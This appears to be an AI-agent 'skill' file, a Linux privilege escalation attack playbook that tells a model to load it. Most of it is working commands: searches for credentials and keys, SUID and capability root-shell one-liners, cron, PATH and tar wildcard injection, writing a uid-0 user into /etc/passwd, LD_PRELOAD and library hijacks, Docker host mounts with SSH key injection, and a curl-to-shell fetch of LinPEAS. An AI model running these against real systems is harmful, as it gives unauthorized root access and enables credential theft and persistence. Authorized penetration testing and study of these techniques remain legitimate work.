SKILL: Linux Privilege Escalation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Linux privesc techniques. Covers enumeration, SUID/SGID, capabilities, cron abuse, kernel exploits, NFS, writable passwd/shadow, LD_PRELOAD, Docker group, and library hijacking. Base models miss subtle escalation paths via capabilities and combined misconfigurations.

0. RELATED ROUTING

Before going deep, consider loading:

container-escape-techniques when the target is a container and you need to escape to host
linux-security-bypass when facing restricted shells, AppArmor, SELinux, or seccomp
linux-lateral-movement after obtaining root for pivoting to adjacent hosts
kubernetes-pentesting when the host is a Kubernetes node

Advanced Reference

Also load SUID_CAPABILITIES_TRICKS.md when you need:

Top 30 SUID binaries with exact exploitation commands (GTFOBins)
Capability-specific exploitation for each dangerous cap
Custom SUID binary exploitation methodology

Also load KERNEL_EXPLOITS_CHECKLIST.md when you need:

Kernel version → exploit mapping table (DirtyPipe, DirtyCow, OverlayFS, etc.)
Exploit compilation tips and cross-compilation notes
Kernel exploit stability assessment

1. ENUMERATION CHECKLIST

Run these immediately after landing a shell:

System Info

uname -a                        # Kernel version
cat /etc/os-release             # Distro and version
cat /proc/version               # Kernel compile info
hostname && id && whoami        # Current context

Sudo & SUID/SGID

sudo -l                         # What can we run as root?
find / -perm -4000 -type f 2>/dev/null   # SUID binaries
find / -perm -2000 -type f 2>/dev/null   # SGID binaries
getcap -r / 2>/dev/null         # Files with capabilities

Cron & Timers

cat /etc/crontab
ls -la /etc/cron.*
crontab -l
systemctl list-timers --all     # systemd timers

Writable Files & Dirs

find / -writable -type f 2>/dev/null | grep -v proc
ls -la /etc/passwd /etc/shadow  # Check permissions
find / -perm -o+w -type d 2>/dev/null   # World-writable dirs

Network & Services

ss -tlnp                        # Listening services
cat /proc/net/tcp               # Raw TCP connections
ps aux                          # Running processes
env                             # Environment variables (credentials?)

Credential Locations

cat ~/.bash_history
cat ~/.mysql_history
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" 2>/dev/null | head -30
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null

2. SUID/SGID EXPLOITATION

GTFOBins Methodology

Find SUID binaries: find / -perm -4000 -type f 2>/dev/null
Cross-reference each with GTFOBins
Use the "SUID" section specifically — not all binary abuse works with SUID

Quick-Win SUID Escalations

Binary	Command
`bash`	`bash -p`
`find`	`find . -exec /bin/sh -p \; -quit`
`vim`	`vim -c ':!/bin/sh'`
`python`	`python -c 'import os; os.execl("/bin/sh","sh","-p")'`
`env`	`env /bin/sh -p`
`nmap` (old)	`nmap --interactive` → `!sh`
`awk`	`awk 'BEGIN {system("/bin/sh -p")}'`
`less`	`less /etc/passwd` → `!/bin/sh`
`cp`	Copy `/etc/passwd`, add root user, copy back

Shared Library Hijacking (SUID Binary)

ldd /usr/local/bin/suid_binary                    # Check loaded libraries
strace /usr/local/bin/suid_binary 2>&1 | grep -i "open.*\.so"  # Find load paths

# If it loads from a writable directory — inject constructor:
gcc -shared -fPIC -o /writable/path/libevil.so evil.c
# evil.c: __attribute__((constructor)) → setuid(0); system("/bin/bash -p")

3. CAPABILITIES ABUSE

Capability	Risk	Exploitation
`cap_setuid`	Critical	`python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'`
`cap_dac_override`	Critical	Read/write any file regardless of permissions
`cap_dac_read_search`	High	Read any file — dump `/etc/shadow`
`cap_sys_admin`	Critical	Mount filesystems, BPF, namespace manipulation
`cap_sys_ptrace`	High	Inject into root processes via ptrace
`cap_net_raw`	Medium	Sniff traffic, ARP spoofing
`cap_net_bind_service`	Low	Bind to privileged ports (<1024)
`cap_fowner`	High	Change ownership of any file

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example: python3 with cap_setuid
# /usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

4. CRON / TIMER ABUSE

Writable Cron Scripts

# Find cron jobs running as root
cat /etc/crontab | grep root
ls -la /etc/cron.d/

# If a root-owned cron runs a script writable by current user:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /writable/script.sh
# Wait for cron → /tmp/bash -p

PATH Hijacking in Cron

# If crontab has: PATH=/home/user:/usr/local/bin:/usr/bin
# And runs: * * * * * root backup.sh (without full path)
# Create /home/user/backup.sh:
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh

Wildcard Injection (tar)

# If cron runs: tar czf /backup/archive.tar.gz *
# In the target directory, create:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
# tar interprets filenames as arguments

pspy — Monitor Processes Without Root

# Upload pspy64 or pspy32 to target
./pspy64
# Watch for cron jobs, services, and background processes

5. NFS NO_ROOT_SQUASH

# On attacker: check exported shares
showmount -e TARGET_IP

# If no_root_squash is set:
mount -t nfs TARGET_IP:/share /mnt/nfs
# As root on attacker box:
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash

# On target:
/share/bash -p    # root shell

6. WRITABLE /etc/passwd OR /etc/shadow

Writable /etc/passwd

# Generate password hash
openssl passwd -1 -salt xyz password123
# → $1$xyz$...hash...

# Append root-equivalent user
echo 'hacker:$1$xyz$hash:0:0::/root:/bin/bash' >> /etc/passwd

# Or replace root's 'x' with generated hash (if no shadow file)

Writable /etc/shadow

# Generate SHA-512 hash
mkpasswd -m sha-512 password123

# Replace root's hash in /etc/shadow

7. LD_PRELOAD / LD_LIBRARY_PATH WITH SUDO

# If sudo -l shows: env_keep+=LD_PRELOAD or env_keep+=LD_LIBRARY_PATH
# Compile .so with _init() that calls setresuid(0,0,0) + system("/bin/bash -p")
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/some_allowed_binary

8. DOCKER GROUP → ROOT

# If current user is in the docker group:
id    # check for "docker" in groups

# Mount host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Or add SSH key
docker run -v /root:/mnt --rm -it alpine sh -c \
  'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'

9. PYTHON / PERL / RUBY LIBRARY HIJACKING

# Python: if a root-executed script does "import somelib"
# Check python path order:
python3 -c 'import sys; print("\n".join(sys.path))'

# Place malicious module in writable path that comes first:
cat > /writable/path/somelib.py << 'EOF'
import os
os.system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash")
EOF

# Perl: PERL5LIB / @INC manipulation
# Ruby: RUBYLIB / $LOAD_PATH manipulation

10. AUTOMATED TOOLS

Tool	Purpose	Command
LinPEAS	Comprehensive enumeration	`curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh \| sh`
linux-exploit-suggester	Kernel exploit suggestions	`./linux-exploit-suggester.sh`
pspy	Monitor processes (no root needed)	`./pspy64`
LinEnum	Legacy enumeration	`./LinEnum.sh -t`
GTFOBins	SUID/sudo/capability abuse reference	https://gtfobins.github.io/

11. PRIVILEGE ESCALATION DECISION TREE

Low-privilege shell obtained
│
├── sudo -l shows entries?
│   ├── GTFOBins match? → exploit directly
│   ├── env_keep has LD_PRELOAD? → LD_PRELOAD hijack (§7)
│   ├── NOPASSWD on custom script? → review script for injection
│   └── (ALL) with password? → check for password reuse/hashes
│
├── SUID/SGID binaries found?
│   ├── Standard binary on GTFOBins? → SUID exploit (§2)
│   ├── Custom binary? → reverse engineer, check libs (strace/ltrace)
│   └── Shared lib from writable path? → library hijack (§2)
│
├── Capabilities on binaries?
│   ├── cap_setuid? → instant root (§3)
│   ├── cap_dac_override? → write /etc/passwd (§6)
│   ├── cap_sys_admin? → mount / namespace tricks
│   └── cap_sys_ptrace? → process injection
│
├── Cron jobs running as root?
│   ├── Writable script? → inject payload (§4)
│   ├── Missing full path? → PATH hijack (§4)
│   └── Uses wildcards? → wildcard injection (§4)
│
├── Writable sensitive files?
│   ├── /etc/passwd writable? → add root user (§6)
│   ├── /etc/shadow writable? → replace root hash (§6)
│   └── systemd unit files writable? → add ExecStartPre
│
├── Docker/LXD group membership?
│   └── Yes → mount host filesystem (§8)
│
├── NFS shares with no_root_squash?
│   └── Yes → SUID binary via NFS (§5)
│
├── Kernel version old/unpatched?
│   └── Check KERNEL_EXPLOITS_CHECKLIST.md
│
└── None of the above?
    ├── Run LinPEAS for comprehensive scan
    ├── Check for password reuse (bash_history, config files)
    ├── Check internal services (127.0.0.1 listeners)
    └── Monitor processes with pspy for hidden opportunities

linux-privilege-escalation

SKILL: Linux Privilege Escalation — Expert Attack Playbook

0. RELATED ROUTING

Advanced Reference

1. ENUMERATION CHECKLIST

System Info

Sudo & SUID/SGID

Cron & Timers

Writable Files & Dirs

Network & Services

Credential Locations

2. SUID/SGID EXPLOITATION

GTFOBins Methodology

Quick-Win SUID Escalations

Shared Library Hijacking (SUID Binary)

3. CAPABILITIES ABUSE

4. CRON / TIMER ABUSE

Writable Cron Scripts

PATH Hijacking in Cron

Wildcard Injection (tar)

pspy — Monitor Processes Without Root

5. NFS NO_ROOT_SQUASH

6. WRITABLE /etc/passwd OR /etc/shadow

Writable /etc/passwd

Writable /etc/shadow

7. LD_PRELOAD / LD_LIBRARY_PATH WITH SUDO

8. DOCKER GROUP → ROOT

9. PYTHON / PERL / RUBY LIBRARY HIJACKING

10. AUTOMATED TOOLS

11. PRIVILEGE ESCALATION DECISION TREE